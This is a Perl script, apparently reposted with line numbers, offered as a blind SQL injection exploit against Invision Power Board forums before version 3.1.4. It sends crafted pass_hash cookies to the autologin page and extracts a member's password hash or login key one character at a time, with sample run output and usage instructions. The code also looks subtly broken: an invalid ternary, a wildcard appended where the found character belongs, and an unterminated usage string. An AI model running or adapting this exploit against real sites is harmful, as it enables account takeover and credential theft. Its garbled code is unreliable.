asda

1. #!/usr/bin/perl
2.  
3. ## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
4. ## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
5. ## tested on version 1 Final and version 3.1.4
6. ## * work on all mysql versions
7. ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
8. ## (c)oded by 1dt.w0lf
9. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
10. ## screen:
11. ## ~~~~~~~
12. ## r57ipb3.pl blah.com /ipb13/ 1 0
13. ## [~] SERVER : blah.com
14. ## [~] PATH : /ipb13/
15. ## [~] MEMBER ID : 1
16. ## [~] TARGET : 0 - IPB 1.*
17. ## [~] SEARCHING PASSWORD ... [ DONE ]
18. ##
19. ## MEMBER ID : 1
20. ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
21. ##
22. ## r57ipb3.pl blah.com /ipb314/ 1 1
23. ## [~] SERVER : blah.com
24. ## [~] PATH : /ipb314/
25. ## [~] MEMBER ID : 1
26. ## [~] TARGET : 1 - IPB 2.*
27. ## [~] SEARCHING PASSWORD ... [ DONE ]
28. ##
29. ## MEMBER ID : 1
30. ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
31. ##
32. ## r57ipb3.pl blah.com /ipb314/ 1 1
33. ## [~] SERVER : blah.com
34. ## [~] PATH : /ipb314/
35. ## [~] MEMBER ID : 1
36. ## [~] TARGET : 1 - IPB 3.*
37. ## [~] SEARCHING PASSWORD ... [ DONE ]
38. ##
39. ## MEMBER ID : 1
40. ## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
41. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
42. ## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
43. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
44. ## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
45. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
46.  
47. use IO::Socket;
48.  
49. if (@ARGV < 4) { &usage; }
50.  
51. $server = $ARGV[0];
52. $path = $ARGV[1];
53. $member_id = $ARGV[2];
54. $target = $ARGV[3];
55.  
56. $pass = ($target)?('member_login_key'):('password');
57.  
58. $server =~ s!(http:\/\/)!!;
59.  
60. $request = 'http://';
61. $request .= $server;
62. $request .= $path;
63.  
64. $s_num = 1;
65. $|++;
66. $n = 0;
67.  
68. print "[~] SERVER : $server\r\n";
69. print "[~] PATH : $path\r\n";
70. print "[~] MEMBER ID : $member_id\r\n";
71. print "[~] TARGET : $target";
72. print (($target)?(' - IPB 3.*'):(' - IPB 2.*'):(' - IPB 1.*'));
73. print "\r\n";
74. print "[~] SEARCHING PASSWORD ... [|]";
75.  
76. ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
77.  
78. while(1)
79. {
80. if(&found(47,58)==0) { &found(96,122); }
81. $char = $i;
82. if ($char=="0")
83. {
84. if(length($allchar) > 0){
85. print qq{\b\b DONE ]
86.  
87. MEMBER ID : $member_id
88. };
89. print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
90. print $allchar."\r\n";
91. }
92. else
93. {
94. print "\b\b FAILED ]";
95. }
96. exit();
97. }
98. else
99. {
100. $allchar .= chr(42);
101. }
102. $s_num++;
103. }
104.  
105. sub found($$)
106. {
107. my $fmin = $_[0];
108. my $fmax = $_[1];
109. if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
110.  
111. $r = int($fmax - ($fmax-$fmin)/2);
112. $check = " BETWEEN $r AND $fmax";
113. if ( &check($check) ) { &found($r,$fmax); }
114. else { &found($fmin,$r); }
115. }
116.  
117. sub crack($$)
118. {
119. my $cmin = $_[0];
120. my $cmax = $_[1];
121. $i = $cmin;
122. while ($i<$cmax)
123. {
124. $crcheck = "=$i";
125. if ( &check($crcheck) ) { return $i; }
126. $i++;
127. }
128. $i = 0;
129. return $i;
130. }
131.  
132. sub check($)
133. {
134. $n++;
135. status();
136. $ccheck = $_[0];
137. $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
138. $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
139. $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
140. $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
141. $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
142. $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
143.  
144. printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection:
145.  
146. close\n\n",
147. $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
148.  
149. while(<$socket>)
150. {
151. if (/Set-Cookie: session_id=0;/) { return 1; }
152. }
153.  
154. return 0;
155. }
156.  
157. sub status()
158. {
159. $status = $n % 5;
160. if($status==0){ print "\b\b/]"; }
161. if($status==1){ print "\b\b-]"; }
162. if($status==2){ print "\b\b\\]"; }
163. if($status==3){ print "\b\b|]"; }
164. }
165.  
166. sub usage()
167. {
168. print q(
169. Invision Power Board v < 3.1.4 SQL injection exploit
170. ----------------------------------------------------
171. USAGE:
172. ~~~~~~
173. r57ipb3.pl [server] [/folder/] [member_id] [target]
174.  
175. [server] - host where IPB installed
176. [/folder/] - folder where IPB installed
177. [member_id] - user id for brute
178.  
179. targets:
180. 0 - IPB 1.*
181. 1 - IPB 2.*
182. 2 - IPB 3.* (Prior To 3.1.4)
183.  
184. e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1
185. ----------------------------------------------------
186. print $target(' - IPB 3.*');